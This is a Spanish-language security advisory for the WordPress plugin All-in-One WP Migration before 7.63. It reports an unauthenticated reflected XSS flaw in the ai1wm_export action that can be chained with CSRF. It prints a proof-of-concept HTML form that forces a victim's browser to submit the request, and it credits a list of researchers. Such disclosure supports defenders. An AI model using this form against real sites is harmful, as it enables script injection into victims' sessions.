
All-in-One WP Migration < 7.63 - XSS Reflejado sin autenticación + CSRF
El plugin utiliza el tipo de contenido incorrecto y no escapa adecuadamente la respuesta de la acción ai1wm_export, permitiendo a un atacante crear una solicitud que, cuando sea enviada por cualquier visitante, inyectará HTML o JavaScript arbitrario en la respuesta que se ejecutará en la sesión de la víctima.
Para reproducir la falla, podemos exportar todo el contenido del sitio web mediante el plugin e insertar un nombre inválido en el nombre del archivo de salida.
Al validar la vulnerabilidad, es posible combinar el ataque con un CSRF, lo que forzará al navegador de la víctima a enviar una solicitud con el payload.
<form action="https://example.com/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" method="POST">
<!--
Note: The secret key must be obtained through other means.
It is stored in the site option `ai1wm_secret_key`, but is
static for the lifetime of the site.
-->
<input type="hidden" name="secret_key" value="[secret_key]">
<input type="hidden" name="ai1wm_manual_export" value="1">
<input type="hidden" name="archive" value="">
<input type="submit" value="Get rich!">
</form>
All-in-One WP Migration < 7.63
Tipo: Cross-Site Scripting
OWASP TOP 10: A03:2021-Injection
Geovanni Campos (GeoZIN), Thiago Martins (Kirito), Jorge Buzeti (R3tr0), Leandro Inacio (Saitama), Lucas de Souza (Sinnat), Matheus Oliveira (Froyd), Filipe Baptistella (Baptistella), Leonardo Paiva (Megatron), Jose Thomaz (Pip3r), Joao Maciel (Yohan), Vinicius Pereira (Vini), , Hudson Nowak (Nowak) e Guilherme Acerbi (Ghost).